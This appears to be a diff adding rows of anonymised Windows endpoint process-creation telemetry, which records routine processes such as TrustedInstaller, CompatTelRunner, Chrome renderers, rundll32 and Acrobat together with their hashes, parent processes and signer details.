+30,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:54:25.707502300+00:00,13000,TrustedInstaller.exe,TrustedInstaller.exe,PortableExecutable,2021-02-17 04:35:16.767474300+00:00,C:\Windows\servicing\TrustedInstaller.exe,156480,00c358b55509eaae79292d8e61fc317e,3759ab1b549f440d6769f9bddf38a5562b0ab938b93a1cd172befaf133963ede,642c216e51f8999629deba18dab857efa2b892ec,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:25.730274200+00:00,2021-06-24 00:55:46.450708+00:00,6a132c36-dd21-4a24-bf4a-bf0bb86dc0c6,computerpii_0a470890c60768167990033d701e7bd881398861,169089,False,10.7740.19041.1052,False,11540474045136906,,11540474045175323,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.789,TrustedInstaller.exe,TrustedInstaller.exe,Windows Modules Installer
+31,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:54:25.737133100+00:00,11908,TiWorker.exe,TiWorker.exe -Embedding,PortableExecutable,2021-06-09 01:15:48.791212900+00:00,C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1022_none_7e372e9e7c6ecccb\TiWorker.exe,239432,7d0c2a24dca67dde6d573e23871f5f0b,18a56c58b18030c70492189d7de2d1813e363b1fb6c59756b4e81e1071492a0e,2bc1a72ad7abb1b0008d961b8278f02289a41028,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:26.588605900+00:00,2021-06-24 00:55:46.450854800+00:00,d508212a-987e-43f5-a7cc-87cacc156113,computerpii_0a470890c60768167990033d701e7bd881398861,169093,False,10.7740.19041.1052,False,11540474045136908,,11540474045175324,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1022,TiWorker.exe,TiWorker.exe,Windows Modules Installer Worker
+32,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:54:31.676928700+00:00,9464,CompatTelRunner.exe,compattelrunner.exe -m:GeneralTel.dll -f:RunGeneralTelemetry  -cV gbdKcilcyUCvVzfm.1.1 -SendFullTelemetry -ThrottleUtc,PortableExecutable,2021-04-14 01:10:17.849732200+00:00,C:\Windows\System32\CompatTelRunner.exe,160072,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:54:21.441083700+00:00,15568,CompatTelRunner.exe,CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun -cv:gbdKcilcyUCvVzfm.1,True,2021-06-24 00:54:21.257173600+00:00,14188,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:31.917464500+00:00,2021-06-24 00:55:46.452196500+00:00,27afad22-1130-4cfb-920d-923a6b59d383,computerpii_0a470890c60768167990033d701e7bd881398861,169131,False,10.7740.19041.1052,False,11540474045175318,,11540474045175325,2021-06-24 00:54:21.441083700+00:00,15568,2021-06-24 00:54:21.441083700+00:00,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,15568,128,ActiveProcessStartkey,C:\Windows\System32,160072,2038-11-30 03:05:59+00:00,2021-04-14 01:10:17.855025900+00:00,2021-06-24 00:54:21.245734700+00:00,2021-04-14 01:10:17.849732200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry
+33,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:54:33.581058600+00:00,11324,powershell.exe,powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';,PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:54:21.441083700+00:00,15568,CompatTelRunner.exe,CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun -cv:gbdKcilcyUCvVzfm.1,True,2021-06-24 00:54:21.257173600+00:00,14188,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:33.898075300+00:00,2021-06-24 00:55:46.452655100+00:00,a623365a-b205-449c-afcb-f1faf9bc1faa,computerpii_0a470890c60768167990033d701e7bd881398861,169143,False,10.7740.19041.1052,False,11540474045175318,,11540474045175326,2021-06-24 00:54:21.441083700+00:00,15568,2021-06-24 00:54:21.441083700+00:00,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,15568,128,ActiveProcessStartkey,C:\Windows\System32,160072,2038-11-30 03:05:59+00:00,2021-04-14 01:10:17.855025900+00:00,2021-06-24 00:54:21.245734700+00:00,2021-04-14 01:10:17.849732200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+34,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:28:23.226348600+00:00,16628,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320850_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320850 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:28:23.324379300+00:00,2021-06-25 01:29:13.816576100+00:00,3c9a6264-4a77-41fa-abaf-eeea91c1e953,computerpii_0a470890c60768167990033d701e7bd881398861,183431,False,10.7740.19041.1052,False,11540474045144190,,11540474045178757,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+35,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:18:36.661800+00:00,2828,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1732,11555426520389665454,4002175263595542303,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6528 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.915074600+00:00,11880,chrome.exe,"""chrome.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:18:36.777625100+00:00,2021-06-23 02:20:44.162706300+00:00,06de4d2b-bc7f-4e9c-930d-cca7209dd7ad,computerpii_0a470890c60768167990033d701e7bd881398861,159652,False,10.7740.19041.1052,False,11540474045171838,,11540474045172705,2021-06-23 00:51:42.915074600+00:00,11880,2021-06-23 00:51:42.915074600+00:00,chrome.exe,11880,256,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+36,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:18:36.769251100+00:00,20072,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1732,11555426520389665454,4002175263595542303,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6356 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.915074600+00:00,11880,chrome.exe,"""chrome.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:18:36.910072500+00:00,2021-06-23 02:20:44.162916+00:00,fe9f437d-17ed-48ca-b826-6daf07da2ac2,computerpii_0a470890c60768167990033d701e7bd881398861,159656,False,10.7740.19041.1052,False,11540474045171838,,11540474045172706,2021-06-23 00:51:42.915074600+00:00,11880,2021-06-23 00:51:42.915074600+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,11880,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+37,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:18:39.045490500+00:00,13628,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1732,11555426520389665454,4002175263595542303,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6604 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.915074600+00:00,11880,chrome.exe,"""chrome.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:18:39.549506800+00:00,2021-06-23 02:20:44.163469+00:00,4957b536-532e-43f6-b005-35738a21bf53,computerpii_0a470890c60768167990033d701e7bd881398861,159667,False,10.7740.19041.1052,False,11540474045171838,,11540474045172707,2021-06-23 00:51:42.915074600+00:00,11880,2021-06-23 00:51:42.915074600+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,11880,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+38,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:18:41.234892300+00:00,6088,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1732,11555426520389665454,4002175263595542303,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6832 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.915074600+00:00,11880,chrome.exe,"""chrome.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:18:41.283906700+00:00,2021-06-23 02:20:44.163724900+00:00,c9d0c584-fa12-458a-ac9d-cc595b6411ee,computerpii_0a470890c60768167990033d701e7bd881398861,159672,False,10.7740.19041.1052,False,11540474045171838,,11540474045172708,2021-06-23 00:51:42.915074600+00:00,11880,2021-06-23 00:51:42.915074600+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,11880,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+39,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:18:56.830895800+00:00,11096,rundll32.exe,"rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding",PortableExecutable,2021-02-17 04:35:14.391957+00:00,C:\Windows\System32\rundll32.exe,71680,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:18:56.880009500+00:00,2021-06-24 03:21:31.816995+00:00,232a32af-2e6a-455d-9e32-dffbd148ac96,computerpii_0a470890c60768167990033d701e7bd881398861,174061,False,10.7740.19041.1052,False,11540474045136908,,11540474045176200,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32)
+40,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:18:58.493511600+00:00,17444,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Downloads\FilePII_078283040e9b0a98aca7d0d9108d59efb1e7f921.pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,False,2021-06-24 00:52:12.833640100+00:00,13428,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:18:58.697922100+00:00,2021-06-24 03:21:31.818116500+00:00,0a9d3e7c-a770-43de-a04f-15a04701cc6d,computerpii_0a470890c60768167990033d701e7bd881398861,174078,False,10.7740.19041.1052,False,11540474045175127,,11540474045176201,2021-06-24 00:52:13.094577200+00:00,18420,2021-06-24 00:52:13.094577200+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,18420,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 00:52:13.096789600+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,1.0,1025.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
